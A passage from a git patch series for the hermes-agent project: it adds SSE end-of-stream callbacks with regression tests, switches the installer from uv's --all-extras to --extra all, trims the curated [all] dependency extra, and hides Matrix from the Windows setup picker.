@@ -1168,6 +1168,9 @@ class APIServerAdapter(BasePlatformAdapter):
                 agent_ref=agent_ref,
                 gateway_session_key=gateway_session_key,
             ))
+            # Ensure SSE drain loops can terminate without relying on polling
+            # agent_task.done(), which can race with queue timeout checks.
+            agent_task.add_done_callback(lambda _fut: _stream_q.put(None))
 
             return await self._write_sse_chat_completion(
                 request, completion_id, model_name, created, _stream_q,
@@ -2197,6 +2200,9 @@ class APIServerAdapter(BasePlatformAdapter):
                 agent_ref=agent_ref,
                 gateway_session_key=gateway_session_key,
             ))
+            # Ensure SSE drain loops can terminate without relying on polling
+            # agent_task.done(), which can race with queue timeout checks.
+            agent_task.add_done_callback(lambda _fut: _stream_q.put(None))
 
             response_id = f"resp_{uuid.uuid4().hex[:28]}"
             model_name = body.get("model", self._model_name)
diff --git a/tests/gateway/test_api_server.py b/tests/gateway/test_api_server.py
index 9e00a375871..66b304fff51 100644
--- a/tests/gateway/test_api_server.py
+++ b/tests/gateway/test_api_server.py
@@ -681,6 +681,56 @@ class TestChatCompletionsEndpoint:
                 assert "[DONE]" in body
                 assert "Hello!" in body
 
+    @pytest.mark.asyncio
+    async def test_stream_task_done_callback_enqueues_eos_for_chat_completions(self, adapter):
+        """Regression guard for #24451: completion callback must signal SSE EOS."""
+        app = _create_app(adapter)
+        async with TestClient(TestServer(app)) as cli:
+            class _FakeTask:
+                def __init__(self):
+                    self.callbacks = []
+
+                def add_done_callback(self, cb):
+                    self.callbacks.append(cb)
+
+            fake_task = _FakeTask()
+
+            def _fake_ensure_future(coro):
+                # We short-circuit task scheduling in this unit test.
+                coro.close()
+                return fake_task
+
+            with (
+                patch.object(
+                    adapter,
+                    "_run_agent",
+                    new=AsyncMock(
+                        return_value=(
+                            {"final_response": "ok", "messages": [], "api_calls": 1},
+                            {"input_tokens": 1, "output_tokens": 1, "total_tokens": 2},
+                        )
+                    ),
+                ),
+                patch("gateway.platforms.api_server.asyncio.ensure_future", side_effect=_fake_ensure_future),
+                patch.object(adapter, "_write_sse_chat_completion", new_callable=AsyncMock) as mock_write_sse,
+            ):
+                mock_write_sse.return_value = web.Response(status=200, text="ok")
+                resp = await cli.post(
+                    "/v1/chat/completions",
+                    json={
+                        "model": "test",
+                        "messages": [{"role": "user", "content": "hi"}],
+                        "stream": True,
+                    },
+                )
+                assert resp.status == 200
+
+            assert len(fake_task.callbacks) == 1
+            stream_q = mock_write_sse.call_args.args[4]
+            assert stream_q.empty()
+            fake_task.callbacks[0](fake_task)
+            assert stream_q.get_nowait() is None
+
     @pytest.mark.asyncio
     async def test_stream_sends_keepalive_during_quiet_tool_gap(self, adapter):
         """Idle SSE streams should send keepalive comments while tools run silently."""
@@ -1676,6 +1726,52 @@ class TestResponsesStreaming:
                 assert "Hello" in body
                 assert " world" in body
 
+    @pytest.mark.asyncio
+    async def test_stream_task_done_callback_enqueues_eos_for_responses(self, adapter):
+        """Regression guard for #24451 on /v1/responses streaming path."""
+        app = _create_app(adapter)
+        async with TestClient(TestServer(app)) as cli:
+            class _FakeTask:
+                def __init__(self):
+                    self.callbacks = []
+
+                def add_done_callback(self, cb):
+                    self.callbacks.append(cb)
+
+            fake_task = _FakeTask()
+
+            def _fake_ensure_future(coro):
+                # We short-circuit task scheduling in this unit test.
+                coro.close()
+                return fake_task
+
+            with (
+                patch.object(
+                    adapter,
+                    "_run_agent",
+                    new=AsyncMock(
+                        return_value=(
+                            {"final_response": "ok", "messages": [], "api_calls": 1},
+                            {"input_tokens": 1, "output_tokens": 1, "total_tokens": 2},
+                        )
+                    ),
+                ),
+                patch("gateway.platforms.api_server.asyncio.ensure_future", side_effect=_fake_ensure_future),
+                patch.object(adapter, "_write_sse_responses", new_callable=AsyncMock) as mock_write_sse,
+            ):
+                mock_write_sse.return_value = web.Response(status=200, text="ok")
+                resp = await cli.post(
+                    "/v1/responses",
+                    json={"model": "hermes-agent", "input": "hi", "stream": True},
+                )
+                assert resp.status == 200
+
+            assert len(fake_task.callbacks) == 1
+            stream_q = mock_write_sse.call_args.kwargs["stream_q"]
+            assert stream_q.empty()
+            fake_task.callbacks[0](fake_task)
+            assert stream_q.get_nowait() is None
+
     @pytest.mark.asyncio
     async def test_stream_emits_function_call_and_output_items(self, adapter):
         app = _create_app(adapter)
@@ -3061,4 +3157,3 @@ class TestSessionKeyHeader:
             assert resp.status == 200
             data = await resp.json()
             assert data["features"]["session_key_header"] == "X-Hermes-Session-Key"
-

From 3955aefced81b1adf3557b2a64ea30c62fc51f99 Mon Sep 17 00:00:00 2001
From: Teknium <127238744+teknium1@users.noreply.github.com>
Date: Tue, 12 May 2026 15:06:25 -0700
Subject: [PATCH 24/59] fix(install): use `--extra all` not `--all-extras`;
 drop lazy-covered extras from [all] (#24515)
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

* fix(install): use `--extra all` not `--all-extras`; drop lazy-covered extras from [all]

Two coupled fixes for the Windows install hang where uv sync built
python-olm from sdist and failed on missing make.

# Root cause: --all-extras vs --extra all (credit: ethernet)

`uv sync --all-extras` installs every key in [project.optional-
dependencies], bypassing the curated [all] extra entirely. So even
when [all] excluded [matrix], [rl], [yc-bench], etc., the installer
pulled them anyway because they were still defined as extras. On
Windows that meant python-olm (no wheel, needs make to build from
sdist) and the install died there.

The right flag is `--extra all` — install just the [all] extra's
contents, respecting curation. Empirically verified via dry-run:

  --all-extras: pulls python-olm, mautrix, ctranslate2, onnxruntime,
                atroposlib, tinker, wandb, modal, daytona, vercel,
                python-telegram-bot, discord.py, slack-bolt,
                dingtalk-stream, lark-oapi, anthropic, boto3,
                edge-tts, elevenlabs, exa-py, fal-client, faster-
                whisper, firecrawl-py, honcho-ai, parallel-web
  --extra all:  pulls none of those — just [all]'s curated set

Dockerfile already uses `--extra all` (with comment explaining the
gotcha) — knowledge existed; the gap was install.sh / install.ps1 /
setup-hermes.sh.

Sites fixed: scripts/install.sh L1118, scripts/install.ps1 L809,
setup-hermes.sh L245.

# Companion fix: drop lazy-covered extras from [all]

`tools/lazy_deps.py` already covers anthropic, bedrock, exa,
firecrawl, parallel-web, fal, edge-tts, elevenlabs, modal, daytona,
vercel, all messaging platforms (telegram/discord/slack/matrix/
dingtalk/feishu), honcho, and faster-whisper. They were ALSO in
[all], which defeats the whole point of lazy-install — fresh
installs eager-pulled them and inherited whatever was broken
upstream (the matrix → python-olm → no Windows wheel chain being
the proximate symptom).

[all] now contains only what genuinely can't be lazy-installed:
cron, cli, dev, pty, mcp, homeassistant, sms, acp, google, web,
youtube. Same trim applied to [termux-all]. New regression test
asserts the contract: every extra in LAZY_DEPS must NOT also appear
in [all].

# Companion fix: surface uv progress + errors

setup-hermes.sh's hash-verified path swallowed uv's stderr to a
tempfile, identical to the install.sh bug fixed in PR #24504. Same
fix applied: stream stderr through directly so users see live
progress instead of staring at a frozen prompt.

# Files

- pyproject.toml: trim [all] and [termux-all] to non-lazy extras only.
- scripts/install.sh: --all-extras → --extra all; trim _ALL_EXTRAS /
  _PYPI_EXTRAS to match.
- scripts/install.ps1: --all-extras → --extra all; trim $allExtras /
  $pypiExtras to match.
- setup-hermes.sh: --all-extras → --extra all; stream stderr.
- tests/test_project_metadata.py: invert matrix-in-[all] assertion;
  add lazy-coverage contract test.
- uv.lock: regenerated.

# Validation

5/5 metadata tests pass. 37/37 in update_autostash + tool_token_
estimation. `uv lock --check` passes. Empirical dry-run confirms
`--extra all` excludes python-olm + RL chain on the new lockfile.

* fix(install): parse [all] from pyproject.toml instead of mirroring it

ethernet's review point: the previous patch left two hand-mirrored
copies of [all]'s contents (in install.sh's $_ALL_EXTRAS and
install.ps1's $allExtras). That guarantees future drift the next
time pyproject.toml's [all] changes.

Now both scripts parse pyproject.toml at install time using stdlib
tomllib (Python 3.11+, which the bootstrap step already requires).
Single source of truth. The only purpose of the parsed list is to
build the 'Tier 2: [all] minus broken extras' fallback spec — so we
parse, filter against $brokenExtras, and rebuild the .[a,b,c] spec.

Also: removed redundant fallback tiers.

  Before:   Tier 1 [all]
            Tier 2 [all] minus broken
            Tier 3 PyPI-only extras (no git deps)
            Tier 4 [web,mcp,cron,cli,messaging,dev]
            Tier 5 .

  After:    Tier 1 [all]
            Tier 2 [all] minus broken
            Tier 3 .

Tier 3 (PyPI-only) and Tier 4 (dashboard+core) used to dodge the [rl]
git+sdist deps and the [matrix] python-olm build. Both are no longer
in [all] post-2026-05-12 lazy-install migration, so the carve-out
tiers had no remaining content. Tier 4 also referenced [messaging],
which is now lazy-installed — the hardcoded fallback was actually
inconsistent with the new policy.

Defensive fallback: if tomllib parse fails (corrupted pyproject,
unexpected schema), Tier 2 collapses to '.[all]' (same as Tier 1) so
the broken-extras path becomes a no-op rather than crashing.

* fix(gateway): hide Matrix from setup picker on Windows

Matrix is the one messaging platform that has no working install path
on Windows: [matrix] -> mautrix[encryption] -> python-olm, which has
Linux-only wheels and needs make + libolm to build from sdist. The
[all] cleanup in this PR keeps mautrix out of fresh installs, but a
user who picked Matrix in 'hermes setup gateway' would still walk
into the same sdist build failure when the wizard tried to install
the extra.

Hide the option at the picker so users never get the chance to try.
The gate lives in _all_platforms() — single source of truth for the
setup wizard, the curses gateway-config menu, and any future picker.

Adapter loading at runtime is intentionally NOT gated: users who
already have MATRIX_* env vars set (e.g. config copied from a Linux
install) keep working if they somehow have python-olm available.
This is the lowest-friction fix — picker visibility only.

Tests cover linux/darwin/win32 and verify other platforms aren't
collateral damage.
---
 hermes_cli/gateway.py                         |  14 ++
 pyproject.toml                                |  68 ++++-----
 scripts/install.ps1                           |  85 ++++++-----
 scripts/install.sh                            | 132 ++++++++++--------
 setup-hermes.sh                               |  18 ++-
 .../test_gateway_platform_gating.py           |  61 ++++++++
 tests/test_project_metadata.py                |  75 ++++++++--
 uv.lock                                       |  61 --------
 8 files changed, 296 insertions(+), 218 deletions(-)
 create mode 100644 tests/hermes_cli/test_gateway_platform_gating.py

diff --git a/hermes_cli/gateway.py b/hermes_cli/gateway.py
index c3e1344556e..5eaf715affa 100644
--- a/hermes_cli/gateway.py
+++ b/hermes_cli/gateway.py
@@ -3658,6 +3658,15 @@ def _all_platforms() -> list[dict]:
     ``hermes setup gateway`` without needing the gateway to be running.
     Built-ins keep their dict shape; plugin entries are adapted to the same
     shape with ``_registry_entry`` holding the source.
+
+    Platform-specific gating: some platforms can't be configured on
+    every host. Currently:
+      - Matrix is hidden on Windows. The [matrix] extra pulls
+        ``mautrix[encryption]`` -> ``python-olm``, which has no Windows
+        wheel and needs ``make`` + libolm to build from sdist. There's
+        no native Windows path that works, so we don't offer it in the
+        picker. Users who want Matrix on Windows can run hermes under
+        WSL.
     """
     # Populate the registry so plugin platforms are visible. Idempotent.
     # Bundled platform plugins (``kind: platform``) auto-load unconditionally,
@@ -3671,6 +3680,11 @@ def _all_platforms() -> list[dict]:
         logger.debug("plugin discovery failed during platform enumeration: %s", e)
 
     platforms = [dict(p) for p in _PLATFORMS]
+
+    # Drop platforms that can't function on this host. See docstring.
+    if sys.platform == "win32":
+        platforms = [p for p in platforms if p.get("key") != "matrix"]
+
     by_key = {p["key"]: p for p in platforms}
 
     try:
diff --git a/pyproject.toml b/pyproject.toml
index 68b2a38471b..118f30c501c 100644
--- a/pyproject.toml
+++ b/pyproject.toml
@@ -136,25 +136,12 @@ termux = [
   "hermes-agent[acp]",
 ]
 termux-all = [
-  # Best-effort "install all" profile for Termux: include broad extras that
-  # are known to resolve on Android, while intentionally excluding extras that
-  # currently hard-fail from missing/broken Android wheels/toolchains.
-  #
-  # Excluded for now:
-  # - matrix (mautrix[encryption] -> python-olm build failures on Termux)
-  # - voice  (faster-whisper chain requires ctranslate2/av builds not packaged)
+  # Best-effort "install all" profile for Termux. Same policy as [all]:
+  # only includes extras that aren't covered by `tools/lazy_deps.py`.
+  # Backends like telegram/slack/dingtalk/feishu/honcho lazy-install at
+  # first use, so they're no longer eager-installed here.
   "hermes-agent[termux]",
-  "hermes-agent[messaging]",
-  "hermes-agent[slack]",
-  "hermes-agent[tts-premium]",
-  "hermes-agent[dingtalk]",
-  "hermes-agent[feishu]",
   "hermes-agent[google]",
-  # mistral: omitted from broad termux-all profile — `mistralai` PyPI package
-  # is currently quarantined (malicious 2.4.6 release). Users who explicitly
-  # want Voxtral STT/TTS can still `pip install hermes-agent[mistral]`
-  # directly once PyPI un-quarantines.
-  "hermes-agent[bedrock]",
   "hermes-agent[homeassistant]",
   "hermes-agent[sms]",
   "hermes-agent[web]",
@@ -188,41 +175,36 @@ rl = [
 ]
 yc-bench = ["yc-bench @ git+https://github.com/collinear-ai/yc-bench.git@bfb0c88062450f46341bd9a5298903fc2e952a5c ; python_version >= '3.12'"]
 all = [
-  "hermes-agent[anthropic]",
-  "hermes-agent[exa]",
-  "hermes-agent[firecrawl]",
-  "hermes-agent[parallel-web]",
-  "hermes-agent[fal]",
-  "hermes-agent[edge-tts]",
-  "hermes-agent[modal]",
-  "hermes-agent[daytona]",
-  "hermes-agent[vercel]",
-  "hermes-agent[messaging]",
-  # matrix: python-olm (required by matrix-nio[e2e]) is upstream-broken on
-  # modern macOS (archived libolm, C++ errors with Clang 21+).  On Linux the
-  # [matrix] extra's own marker pulls in the [e2e] variant automatically.
-  "hermes-agent[matrix]; sys_platform == 'linux'",
+  # Policy (2026-05-12): `[all]` includes only extras that genuinely
+  # CAN'T be lazy-installed via `tools/lazy_deps.py` — i.e. things every
+  # session can use, things needed before the agent loop is alive
+  # (terminal/CLI), and skill deps that packagers (Nix, AUR, Homebrew)
+  # need in the wheel. Anything an opt-in backend (provider, search,
+  # TTS, image, memory, messaging platform, terminal sandbox) needs
+  # MUST live exclusively in `LAZY_DEPS` and resolve at first use —
+  # otherwise one quarantined PyPI release breaks every fresh install.
+  #
+  # Removed from [all] on 2026-05-12 (covered by lazy-install):
+  #   anthropic, exa, firecrawl, parallel-web, fal, edge-tts,
+  #   modal, daytona, vercel, messaging (telegram/discord/slack),
+  #   matrix, slack, honcho, voice (faster-whisper),
+  #   dingtalk, feishu, bedrock, tts-premium (elevenlabs)
+  #
+  # Why: the matrix extra in particular pulls `mautrix[encryption]`
+  # which depends on `python-olm`. python-olm has Linux-only wheels and
+  # no native build path on Windows or modern macOS. With matrix in
+  # [all], `uv sync --locked` on Windows tried to build it from sdist
+  # and failed on `make`. Lazy-install routes that build to first use,
+  # where the user is expected to have a toolchain available.
   "hermes-agent[cron]",
   "hermes-agent[cli]",
   "hermes-agent[dev]",
-  "hermes-agent[tts-premium]",
-  "hermes-agent[slack]",
   "hermes-agent[pty]",
-  "hermes-agent[honcho]",
   "hermes-agent[mcp]",
   "hermes-agent[homeassistant]",
   "hermes-agent[sms]",
   "hermes-agent[acp]",
-  "hermes-agent[voice]",
-  "hermes-agent[dingtalk]",
-  "hermes-agent[feishu]",
   "hermes-agent[google]",
-  # mistral: omitted from [all] — `mistralai` PyPI package is currently
-  # quarantined (malicious 2.4.6 release on 2026-05-12). Pulling it from
-  # [all] would break every fresh install / AUR build / Docker build / CI
-  # run until PyPI un-quarantines. Users who explicitly want Voxtral STT/TTS
-  # can still `pip install hermes-agent[mistral]` once it's available again.
-  "hermes-agent[bedrock]",
   "hermes-agent[web]",
   "hermes-agent[youtube]",
 ]
diff --git a/scripts/install.ps1 b/scripts/install.ps1
index 56a338ea069..e2fe765174c 100644
--- a/scripts/install.ps1
+++ b/scripts/install.ps1
@@ -806,7 +806,14 @@ function Install-Dependencies {
     # current extras spec, NOT because they're equivalent in posture.
     if (Test-Path "uv.lock") {
         Write-Info "Trying tier: hash-verified (uv.lock) ..."
-        & $UvCmd sync --all-extras --locked
+        # Critical flag choice: `--extra all`, NOT `--all-extras`.
+        #   --all-extras = every [project.optional-dependencies] key,
+        #                  bypassing the curated [all] extra. On Windows
+        #                  that means [matrix] -> python-olm (no wheel,
+        #                  needs `make` to build from sdist) and the
+        #                  install fails.
+        #   --extra all  = just the [all] extra's contents (curated).
+        & $UvCmd sync --extra all --locked
         if ($LASTEXITCODE -eq 0) {
             Write-Success "Main package installed (hash-verified via uv.lock)"
             $script:InstalledTier = "hash-verified (uv.lock)"
@@ -822,53 +829,59 @@ function Install-Dependencies {
         $skipPipFallback = $false
     }
 
-    # Install main package.  Tiered fallback so a single flaky git+https dep
-    # (atroposlib / tinker in the [rl] extra) doesn't silently drop
-    # dashboard/MCP/cron/messaging extras.  Each tier's stdout/stderr is
+    # Install main package.  Tiered fallback so a single flaky transitive
+    # doesn't silently drop everything.  Each tier's stdout/stderr is
     # preserved — no Out-Null swallowing — so the user can see what failed.
     #
-    # Tier 1: [all] — everything, including RL git+https deps (best case).
-    # Tier 2: [all] minus a small list of currently-broken extras. The
-    #         broken list is centralised in $brokenExtras below — when
-    #         a package gets quarantined / yanked / pulled, add it here
-    #         and the resolver no longer chokes on it. This is what saves
-    #         the user from silently losing 10+ unrelated extras every
-    #         time one upstream package breaks.
-    # Tier 3: [core-extras] synthesised locally — all PyPI-only extras we
-    #         ship, also minus $brokenExtras. Drops [rl] and [matrix]
-    #         (linux-only) which are the usual failure culprits.
-    # Tier 4: [web,mcp,cron,cli,messaging,dev] — the minimum we strongly
-    #         believe a user expects `hermes dashboard` / slash commands /
-    #         cron / messaging platforms to work out of the box.
-    # Tier 5: bare `.` — last-resort so at least the core CLI launches.
+    # Tier 1: [all] — the curated extra in pyproject.toml.
+    # Tier 2: [all] minus the currently-broken extras list ($brokenExtras).
+    #         Edit $brokenExtras below when something on PyPI breaks; this
+    #         lets users keep the rest of [all] when one transitive is
+    #         unavailable. The list of [all]'s contents is parsed from
+    #         pyproject.toml at runtime — there is NO hand-mirrored copy
+    #         to drift out of sync.
+    # Tier 3: bare `.` — last-resort so at least the core CLI launches.
 
     # Currently-broken extras. Edit this list when an upstream package
     # gets quarantined / yanked / breaks resolution. Empty means everything
     # in [all] should be installable; populate with the names of extras
-    # whose deps are temporarily unavailable to keep installs working
-    # for users.
+    # whose deps are temporarily unavailable.
     $brokenExtras = @()
 
-    $allExtras = @(
-        "modal","daytona","vercel","messaging","matrix","cron","cli","dev",
-        "tts-premium","slack","pty","honcho","mcp","homeassistant","sms",
-        "acp","voice","dingtalk","feishu","google","bedrock","web",
-        "youtube"
-    )
-    $pypiExtras = @(
-        "web","mcp","cron","cli","voice","messaging","slack","dev","acp",
-        "pty","homeassistant","sms","tts-premium","honcho","google",
-        "bedrock","dingtalk","feishu","modal","daytona","vercel","youtube"
-    )
-    $safeAll  = ($allExtras  | Where-Object { $brokenExtras -notcontains $_ }) -join ","
-    $safePypi = ($pypiExtras | Where-Object { $brokenExtras -notcontains $_ }) -join ","
+    # Parse [project.optional-dependencies].all from pyproject.toml.
+    # tomllib is stdlib on Python 3.11+ which the bootstrap guarantees.
+    $pythonExeForParse = if (-not $NoVenv) { "$InstallDir\venv\Scripts\python.exe" } else { (& $UvCmd python find $PythonVersion) }
+    $allExtras = @()
+    if (Test-Path $pythonExeForParse) {
+        $parsed = & $pythonExeForParse -c @"
+import re, sys, tomllib
+try:
+    with open('pyproject.toml', 'rb') as fh:
+        data = tomllib.load(fh)
+    specs = data['project']['optional-dependencies']['all']
+    out = []
+    for s in specs:
+        m = re.search(r'hermes-agent\[([\w-]+)\]', s)
+        if m: out.append(m.group(1))
+    print(','.join(out))
+except Exception:
+    sys.exit(1)
+"@ 2>$null
+        if ($LASTEXITCODE -eq 0 -and $parsed) {
+            $allExtras = $parsed.Trim().Split(',')
+        }
+    }
+    if (-not $allExtras -or $allExtras.Count -eq 0) {
+        Write-Warn "Could not parse [all] from pyproject.toml; Tier 2 will be a no-op."
+        $safeAll = "all"
+    } else {
+        $safeAll = ($allExtras | Where-Object { $brokenExtras -notcontains $_ }) -join ","
+    }
     $brokenLabel = if ($brokenExtras) { ($brokenExtras -join ", ") } else { "none" }
 
     $installTiers = @(
-        @{ Name = "all (with RL/matrix extras)"; Spec = ".[all]" },
+        @{ Name = "all"; Spec = ".[all]" },
         @{ Name = "all minus known-broken ($brokenLabel)"; Spec = ".[$safeAll]" },
-        @{ Name = "PyPI-only extras (no git deps)"; Spec = ".[$safePypi]" },
-        @{ Name = "dashboard + core platforms"; Spec = ".[web,mcp,cron,cli,messaging,dev]" },
         @{ Name = "core only (no extras)"; Spec = "." }
     )
     $installed = $skipPipFallback
diff --git a/scripts/install.sh b/scripts/install.sh
index c54f9ad9ae0..aaa810f3c83 100755
--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -1100,22 +1100,30 @@ install_deps() {
     # extras spec, NOT because they're equivalent in posture.
     if [ -f "uv.lock" ]; then
         log_info "Trying tier: hash-verified (uv.lock) ..."
-        log_info "(this resolves + downloads ~50 packages — first run on a fresh"
-        log_info " venv can take 1-5 minutes; uv prints progress below)"
+        log_info "(this resolves + downloads the curated [all] set — first run on a"
+        log_info " fresh venv can take 1-5 minutes; uv prints progress below)"
         # Stream uv's progress directly to the user instead of swallowing
         # it with `2>"$(mktemp)"`.  Two reasons:
-        #   1. `--all-extras --locked` against a fresh venv has to pull
-        #      every transitive (torch-class deps included) — silencing
-        #      stderr makes the install look frozen for minutes on slow
-        #      networks. Users see "Trying tier: hash-verified ..." and
-        #      assume it's hung.
+        #   1. `--extra all --locked` against a fresh venv has to pull
+        #      every transitive — silencing stderr makes the install
+        #      look frozen for minutes on slow networks. Users see
+        #      "Trying tier: hash-verified ..." and assume it's hung.
         #   2. The previous `2>"$(mktemp)"` substituted the path at
         #      command-build time but never saved it, so on failure the
         #      uv error message was unreachable — the user just got the
         #      generic "lockfile may be stale" warning.
+        #
+        # Critical flag choice: `--extra all`, NOT `--all-extras`.
+        #   --all-extras = every [project.optional-dependencies] key.
+        #                  This bypasses the curated `[all]` extra
+        #                  entirely and pulls e.g. [matrix] (which
+        #                  needs python-olm + make on Windows) and
+        #                  [rl] (git+https deps that fail offline).
+        #   --extra all  = install just the `[all]` extra's contents.
+        #                  This respects the curation in pyproject.toml.
         # uv's own progress UI handles TTY detection and downgrades
         # gracefully when stdout/stderr aren't terminals.
-        if UV_PROJECT_ENVIRONMENT="$INSTALL_DIR/venv" $UV_CMD sync --all-extras --locked; then
+        if UV_PROJECT_ENVIRONMENT="$INSTALL_DIR/venv" $UV_CMD sync --extra all --locked; then
             log_success "Main package installed (hash-verified via uv.lock)"
             log_success "All dependencies installed"
             return 0
@@ -1131,57 +1139,63 @@ install_deps() {
     # fresh install all the way down to "core only" — the user should keep
     # everything else they signed up for.
     #
-    # Tier 1: [all] — everything, including RL git+https deps (best case).
-    # Tier 2: [all] minus the currently-broken extras list. Edit
-    #         _BROKEN_EXTRAS below when something on PyPI breaks; this lets
-    #         users keep voice/honcho/google/slack/matrix/etc. even when
-    #         one transitive is unavailable. List the extras here as bare
-    #         names from pyproject.toml [project.optional-dependencies] —
-    #         the script translates them to `[a,b,c]` form below.
-    # Tier 3: PyPI-only extras (no git deps) — drops [rl] / [yc-bench]
-    #         which are git+https and may fail in restricted networks.
-    # Tier 4: dashboard + core platforms — minimum viable interactive set.
-    # Tier 5: bare `.` — last-resort so at least the core CLI launches.
-    #
-    # Each tier's stderr is captured to a tempfile so we can show the user
-    # WHY the higher tier failed instead of silently dropping support.
+    # Tier 1: [all] — the curated extra in pyproject.toml.
+    # Tier 2: [all] minus the currently-broken extras list (_BROKEN_EXTRAS).
+    #         Edit _BROKEN_EXTRAS below when something on PyPI breaks; this
+    #         lets users keep the rest of [all] when one transitive is
+    #         unavailable. The list of [all]'s contents is parsed from
+    #         pyproject.toml at runtime — there is NO hand-mirrored copy
+    #         to drift out of sync. If you want to change what [all]
+    #         contains, edit pyproject.toml only.
+    # Tier 3: bare `.` — last-resort so at least the core CLI launches.
+    #         Skipped tiers like "PyPI-only extras (no git deps)" used to
+    #         exist to dodge [rl] / [matrix] git+sdist deps; those are no
+    #         longer in [all] post-2026-05-12 lazy-install migration, so
+    #         a separate PyPI-only tier had no remaining content.
     local _BROKEN_EXTRAS=()  # populate when an extra becomes unresolvable
-    local _ALL_EXTRAS=(
-        modal daytona vercel messaging matrix cron cli dev tts-premium slack
-        pty honcho mcp homeassistant sms acp voice dingtalk feishu google
-        bedrock web youtube
-    )
-    # Tier 2: all extras minus _BROKEN_EXTRAS
-    local _SAFE_EXTRAS=()
-    local _e _b _skip
-    for _e in "${_ALL_EXTRAS[@]}"; do
-        _skip=false
-        for _b in "${_BROKEN_EXTRAS[@]}"; do
-            if [ "$_e" = "$_b" ]; then _skip=true; break; fi
+
+    # Parse [project.optional-dependencies].all from pyproject.toml.
+    # tomllib is stdlib on Python 3.11+ which uv's bootstrap guarantees.
+    # Falls back to a hand list if parse fails — defensive only.
+    local _ALL_EXTRAS_CSV
+    _ALL_EXTRAS_CSV="$(
+        "$PYTHON_PATH" - <<'PY' 2>/dev/null
+import re, sys, tomllib
+try:
+    with open("pyproject.toml", "rb") as fh:
+        data = tomllib.load(fh)
+    specs = data["project"]["optional-dependencies"]["all"]
+    extras = []
+    for s in specs:
+        m = re.search(r"hermes-agent\[([\w-]+)\]", s)
+        if m:
+            extras.append(m.group(1))
+    print(",".join(extras))
+except Exception as e:
+    print("", file=sys.stderr)
+    sys.exit(1)
+PY
+    )"
+    if [ -z "$_ALL_EXTRAS_CSV" ]; then
+        log_warn "Could not parse [all] from pyproject.toml; falling back to .[all] only."
+        _ALL_EXTRAS_CSV=""
+    fi
+
+    # Build "[all] minus broken" spec by filtering the parsed list.
+    local _SAFE_SPEC=".[all]"
+    if [ -n "$_ALL_EXTRAS_CSV" ] && [ "${#_BROKEN_EXTRAS[@]}" -gt 0 ]; then
+        local _SAFE_EXTRAS=()
+        local _e _b _skip
+        IFS=',' read -ra _ALL_EXTRAS_ARR <<< "$_ALL_EXTRAS_CSV"
+        for _e in "${_ALL_EXTRAS_ARR[@]}"; do
+            _skip=false
+            for _b in "${_BROKEN_EXTRAS[@]}"; do
+                if [ "$_e" = "$_b" ]; then _skip=true; break; fi
+            done
+            if [ "$_skip" = false ]; then _SAFE_EXTRAS+=("$_e"); fi
         done
-        if [ "$_skip" = false ]; then _SAFE_EXTRAS+=("$_e"); fi
-    done
-    local _SAFE_SPEC
-    _SAFE_SPEC=".[$(IFS=,; echo "${_SAFE_EXTRAS[*]}")]"
-    # Tier 3: PyPI-only extras (no git deps), still skipping broken ones.
-    # Mirrors the install.ps1 list but excludes [rl] / [yc-bench] / [matrix]
-    # (matrix needs python-olm which fails to build on some hosts).
-    local _PYPI_EXTRAS=(
-        web mcp cron cli voice messaging slack dev acp pty homeassistant sms
-        tts-premium honcho google bedrock dingtalk feishu modal daytona vercel
-        youtube
-    )
-    local _PYPI_SAFE=()
-    for _e in "${_PYPI_EXTRAS[@]}"; do
-        _skip=false
-        for _b in "${_BROKEN_EXTRAS[@]}"; do
-            if [ "$_e" = "$_b" ]; then _skip=true; break; fi
-        done
-        if [ "$_skip" = false ]; then _PYPI_SAFE+=("$_e"); fi
-    done
-    local _PYPI_SPEC
-    _PYPI_SPEC=".[$(IFS=,; echo "${_PYPI_SAFE[*]}")]"
-    local _TIER4_SPEC=".[web,mcp,cron,cli,messaging,dev]"
+        _SAFE_SPEC=".[$(IFS=,; echo "${_SAFE_EXTRAS[*]}")]"
+    fi
 
     ALL_INSTALL_LOG=$(mktemp)
     local _installed=false
@@ -1201,10 +1215,8 @@ install_deps() {
         return 1
     }
 
-    install_tier "all (with RL/matrix extras)" ".[all]" \
+    install_tier "all" ".[all]" \
         || install_tier "all minus known-broken (${_BROKEN_EXTRAS[*]:-none})" "$_SAFE_SPEC" \
-        || install_tier "PyPI-only extras (no git deps)" "$_PYPI_SPEC" \
-        || install_tier "dashboard + core platforms" "$_TIER4_SPEC" \
         || install_tier "core only (no extras)" "."
 
     rm -f "$ALL_INSTALL_LOG"
diff --git a/setup-hermes.sh b/setup-hermes.sh
index 0b214b0633c..2aa773c1c9c 100755
--- a/setup-hermes.sh
+++ b/setup-hermes.sh
@@ -241,15 +241,21 @@ else
         # (the direct deps in pyproject.toml are exact-pinned, but
         # `uv pip install` re-resolves transitives fresh from PyPI).
         echo -e "${CYAN}→${NC} Using uv.lock for hash-verified installation..."
-        _UV_SYNC_LOG=$(mktemp)
-        if UV_PROJECT_ENVIRONMENT="$SCRIPT_DIR/venv" $UV_CMD sync --all-extras --locked 2>"$_UV_SYNC_LOG"; then
+        echo -e "${CYAN}→${NC} (first run on a fresh venv can take 1-5 minutes; uv prints progress below)"
+        # Critical flag choice: `--extra all`, NOT `--all-extras`. The
+        # latter installs every [project.optional-dependencies] key,
+        # bypassing the curated [all] extra and pulling backends like
+        # [matrix] (python-olm needs make on Windows) and [rl] (git+https
+        # deps that fail offline). See pyproject.toml's [all] for the
+        # curated set, and tools/lazy_deps.py for backends that install
+        # at first use.
+        # Also: stream stderr through directly so the user sees uv's
+        # progress UI instead of staring at a frozen prompt.
+        if UV_PROJECT_ENVIRONMENT="$SCRIPT_DIR/venv" $UV_CMD sync --extra all --locked; then
             echo -e "${GREEN}✓${NC} Dependencies installed (hash-verified via uv.lock)"
-            rm -f "$_UV_SYNC_LOG"
         else
-            echo -e "${YELLOW}⚠${NC} Lockfile sync failed (lockfile may be stale)."
+            echo -e "${YELLOW}⚠${NC} Lockfile sync failed (see uv output above)."
             echo -e "${YELLOW}⚠${NC} Falling back to PyPI resolve — transitives will NOT be hash-verified."
-            head -5 "$_UV_SYNC_LOG" | sed 's/^/    /'
-            rm -f "$_UV_SYNC_LOG"
             _try_install
             echo -e "${GREEN}✓${NC} Dependencies installed (transitives re-resolved, not hash-verified)"
         fi
diff --git a/tests/hermes_cli/test_gateway_platform_gating.py b/tests/hermes_cli/test_gateway_platform_gating.py
new file mode 100644
index 00000000000..c16875687ce
--- /dev/null
